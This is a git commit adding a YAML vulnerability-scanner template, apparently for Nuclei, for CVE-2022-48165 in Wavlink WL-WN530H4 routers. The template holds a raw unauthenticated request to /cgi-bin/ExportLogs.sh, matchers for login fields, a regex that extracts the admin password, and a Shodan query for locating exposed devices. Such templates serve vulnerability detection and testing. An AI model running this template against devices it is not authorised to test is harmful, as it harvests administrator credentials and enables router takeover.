Create CVE-2022-48165.yaml

2023-02-06 20:45:15 +08:00 · 2023-02-06 20:45:15 +08:00 · 12dfdc42b0
parent 12a5192482
commit 12dfdc42b0
1 changed files with 45 additions and 0 deletions
--- a/cves/2022/CVE-2022-48165.yaml
+++ b/cves/2022/CVE-2022-48165.yaml
@ -0,0 +1,45 @@
+id: CVE-2022-48165
+
+info:
+  name: Wavlink - Configuration Exposure
+  author: For3stCo1d
+  severity: high
+  description: |
+    An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN530H4 M30H4.V5030.210121 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
+  reference:
+    - https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE
+    - https://twitter.com/For3stCo1d/status/1622576544190464000
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165
+    - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+  tags: cve,cve2022,wavlink,router,exposure
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/ExportLogs.sh HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Password='
+          - 'Login='
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - filename="sysLogs.txt"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        regex:
+          - 'Password=([^\s]+)'